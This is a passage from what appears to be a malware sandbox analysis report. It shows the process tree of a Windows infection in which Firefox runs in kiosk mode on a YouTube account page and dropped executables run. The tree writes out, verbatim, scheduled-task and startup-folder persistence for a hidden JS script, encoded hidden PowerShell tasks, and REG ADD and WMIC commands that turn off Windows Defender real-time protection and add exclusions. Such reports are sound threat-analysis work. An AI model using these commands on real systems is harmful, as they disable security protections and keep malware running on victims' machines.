                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1756.2.695855690\70895701" -childID 1 -isForBrowser -prefsHandle 1928 -prefMapHandle 1924 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1afab238-a961-4e70-b453-9a5d2ee3e25e} 1756 "\\.\pipe\gecko-crash-server-pipe.1756" 1940 19259d58 tab
                                                  7⤵
                                                    PID:2684
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1756.3.1505439114\480021427" -childID 2 -isForBrowser -prefsHandle 2624 -prefMapHandle 2620 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b606ca8d-132e-4d64-a479-18e05ef165b1} 1756 "\\.\pipe\gecko-crash-server-pipe.1756" 2636 e69958 tab
                                                    7⤵
                                                      PID:2996
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1756.4.436957518\595540212" -childID 3 -isForBrowser -prefsHandle 3820 -prefMapHandle 3788 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ed4fcce-4f6d-4e94-96f4-fc5ec9e0f95f} 1756 "\\.\pipe\gecko-crash-server-pipe.1756" 3832 20512058 tab
                                                      7⤵
                                                        PID:3852
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1756.5.1615421658\149091657" -childID 4 -isForBrowser -prefsHandle 3940 -prefMapHandle 3944 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e450400-d6d7-4539-9452-384db4c3605e} 1756 "\\.\pipe\gecko-crash-server-pipe.1756" 3928 207faf58 tab
                                                        7⤵
                                                          PID:3892
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1756.6.1775233998\1597308369" -childID 5 -isForBrowser -prefsHandle 4128 -prefMapHandle 4132 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6369c23-5f95-4735-989d-0bff8362c95f} 1756 "\\.\pipe\gecko-crash-server-pipe.1756" 4116 207fb858 tab
                                                          7⤵
                                                            PID:3904
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                        5⤵
                                                          PID:2340
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                            6⤵
                                                            • Checks processor information in registry
                                                            • Modifies registry class
                                                            PID:932
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.0.2026596468\1725436352" -parentBuildID 20221007134813 -prefsHandle 1188 -prefMapHandle 1152 -prefsLen 21788 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e74271a-0cea-4d34-9547-35092d0db83e} 932 "\\.\pipe\gecko-crash-server-pipe.932" 1300 13efbf58 gpu
                                                              7⤵
                                                                PID:4036
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.1.584135265\6467338" -parentBuildID 20221007134813 -prefsHandle 1468 -prefMapHandle 1464 -prefsLen 22649 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {22b6b707-2be7-4e60-b155-ad07326fb0ac} 932 "\\.\pipe\gecko-crash-server-pipe.932" 1480 44e0b58 socket
                                                                7⤵
                                                                  PID:812
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.2.611170535\1879978832" -childID 1 -isForBrowser -prefsHandle 1828 -prefMapHandle 1708 -prefsLen 22752 -prefMapSize 233836 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd59f740-7298-4aeb-96a0-b6d66ff6d380} 932 "\\.\pipe\gecko-crash-server-pipe.932" 1964 1ac2e058 tab
                                                                  7⤵
                                                                    PID:3860
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.3.715551463\766028055" -childID 2 -isForBrowser -prefsHandle 2660 -prefMapHandle 2656 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6cd470b6-cbd2-4d07-9cdb-010a9d6dd8fa} 932 "\\.\pipe\gecko-crash-server-pipe.932" 2672 1ef38258 tab
                                                                    7⤵
                                                                      PID:3968
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.4.1243520841\179792002" -childID 3 -isForBrowser -prefsHandle 3488 -prefMapHandle 3392 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e67d23e-06bc-40b2-a8b2-16a27e2f4dd0} 932 "\\.\pipe\gecko-crash-server-pipe.932" 3360 21368e58 tab
                                                                      7⤵
                                                                        PID:3060
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.5.1071133383\1317673308" -childID 4 -isForBrowser -prefsHandle 3588 -prefMapHandle 3592 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95134b6f-9904-4b6a-a1b7-7f38d68346f3} 932 "\\.\pipe\gecko-crash-server-pipe.932" 3576 21369d58 tab
                                                                        7⤵
                                                                          PID:2844
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.6.1811859391\39070367" -childID 5 -isForBrowser -prefsHandle 3760 -prefMapHandle 3764 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {17f139d4-0243-4291-827e-5a41705e7ce1} 932 "\\.\pipe\gecko-crash-server-pipe.932" 3748 2136a658 tab
                                                                          7⤵
                                                                            PID:2676
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                        5⤵
                                                                          PID:3504
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                            6⤵
                                                                            • Checks processor information in registry
                                                                            • Modifies registry class
                                                                            PID:2068
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.0.531685667\296274148" -parentBuildID 20221007134813 -prefsHandle 1020 -prefMapHandle 1228 -prefsLen 21972 -prefMapSize 233976 -appDir "C:\Program Files\Mozilla Firefox\browser" - {73dc373d-626f-4553-be81-0c83ed7c26ee} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 1304 144ca758 gpu
                                                                              7⤵
                                                                                PID:2760
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.1.711756477\105054932" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 22833 -prefMapSize 233976 -appDir "C:\Program Files\Mozilla Firefox\browser" - {42ab6779-fa9a-4d4e-a430-3b693e798542} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 1500 f0dd258 socket
                                                                                7⤵
                                                                                  PID:1824
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.2.659413142\309344182" -childID 1 -isForBrowser -prefsHandle 1836 -prefMapHandle 1888 -prefsLen 22936 -prefMapSize 233976 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c1a0f14-85cc-41ea-a57d-dd2e3dfe066e} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 1172 1a7f8858 tab
                                                                                  7⤵
                                                                                    PID:3360
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.3.1336648796\1057385737" -childID 2 -isForBrowser -prefsHandle 2660 -prefMapHandle 2656 -prefsLen 27284 -prefMapSize 233976 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d3e6720-8a8a-49c3-8eca-8337e3e20135} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 2672 1cdc9158 tab
                                                                                    7⤵
                                                                                      PID:2752
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.4.1050448348\310843823" -childID 3 -isForBrowser -prefsHandle 3020 -prefMapHandle 3012 -prefsLen 27312 -prefMapSize 233976 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3437c9e-9f6d-44eb-8a54-21e04642bc21} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 2988 e6d358 tab
                                                                                      7⤵
                                                                                        PID:3364
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.5.1682748743\1455072940" -childID 4 -isForBrowser -prefsHandle 3660 -prefMapHandle 3656 -prefsLen 27312 -prefMapSize 233976 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0b85e90-8882-4f35-8b67-3338cc1896f9} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 3672 23907658 tab
                                                                                        7⤵
                                                                                          PID:2988
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.6.32688658\844966608" -childID 5 -isForBrowser -prefsHandle 2972 -prefMapHandle 2976 -prefsLen 27312 -prefMapSize 233976 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {31d18ee1-ed70-4a2e-a593-a900575feab6} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 3080 23906758 tab
                                                                                          7⤵
                                                                                            PID:1300
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.7.840914364\189910137" -childID 6 -isForBrowser -prefsHandle 3000 -prefMapHandle 2996 -prefsLen 27312 -prefMapSize 233976 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f97a4ed-bd6b-40d5-bdd7-3430eb69734e} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 3656 e6a558 tab
                                                                                            7⤵
                                                                                              PID:3868
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.8.151060121\601263285" -childID 7 -isForBrowser -prefsHandle 3984 -prefMapHandle 3988 -prefsLen 27312 -prefMapSize 233976 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {74ff8898-a921-450e-80c7-b0f03f322bb0} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 3976 239f1b58 tab
                                                                                              7⤵
                                                                                                PID:4084
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.9.892258066\170052669" -childID 8 -isForBrowser -prefsHandle 4148 -prefMapHandle 4152 -prefsLen 27312 -prefMapSize 233976 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cec7b9c2-805a-4906-9e23-a0a39eaa0a3a} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 4140 239f0c58 tab
                                                                                                7⤵
                                                                                                  PID:3988
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                              5⤵
                                                                                                PID:1792
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                  6⤵
                                                                                                    PID:3284
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                  5⤵
                                                                                                    PID:2180
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                      6⤵
                                                                                                      • Checks processor information in registry
                                                                                                      PID:2424
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3772
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                              2⤵
                                                                                                PID:868
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                                  3⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2092
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                                                                                2⤵
                                                                                                • Drops startup file
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1996
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                                2⤵
                                                                                                  PID:2184
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:3464
                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                taskeng.exe {19D7FD59-5B5B-4B9A-A358-26D21EF6228A} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                1⤵
                                                                                                  PID:2912
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\dKnaNgr.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\dKnaNgr.exe PV /jyMxdidwiYr 385121 /S
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Drops file in System32 directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:1780
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                      3⤵
                                                                                                        PID:1640
                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                          4⤵
                                                                                                          • Indirect Command Execution
                                                                                                          PID:1672
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                            5⤵
                                                                                                              PID:768
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                6⤵
                                                                                                                  PID:1836
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                              4⤵
                                                                                                              • Indirect Command Execution
                                                                                                              PID:3020
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                5⤵
                                                                                                                  PID:572
                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                    6⤵
                                                                                                                      PID:1480
                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                  4⤵
                                                                                                                  • Indirect Command Execution
                                                                                                                  PID:876
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                    5⤵
                                                                                                                      PID:816
                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                        6⤵
                                                                                                                          PID:1352
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                      4⤵
                                                                                                                      • Indirect Command Execution
                                                                                                                      PID:1084
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                        5⤵
                                                                                                                          PID:1720
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                            6⤵
                                                                                                                              PID:1936
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                          4⤵
                                                                                                                          • Indirect Command Execution
                                                                                                                          PID:2672
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                            5⤵
                                                                                                                              PID:2216
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                6⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2356
                                                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                  7⤵
                                                                                                                                    PID:1696
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /CREATE /TN "guTEulkRD" /SC once /ST 05:47:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                            3⤵
                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                            PID:3196
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /run /I /tn "guTEulkRD"
                                                                                                                            3⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3596
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /DELETE /F /TN "guTEulkRD"
                                                                                                                            3⤵
                                                                                                                              PID:3712
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:3808
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                  4⤵
                                                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                                                  PID:2384
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:3156
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                    4⤵
                                                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                                                    PID:2092
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TN "gKwvMVwHZ" /SC once /ST 18:00:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                  3⤵
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:3064
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /run /I /tn "gKwvMVwHZ"
                                                                                                                                  3⤵
                                                                                                                                    PID:2448
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "gKwvMVwHZ"
                                                                                                                                    3⤵
                                                                                                                                      PID:3244
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                                                      3⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      PID:2416
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                        4⤵
                                                                                                                                          PID:592
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                            5⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:1524
                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                              6⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4048
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:1104
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            4⤵
                                                                                                                                            • Windows security bypass
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:2680
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:1564
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
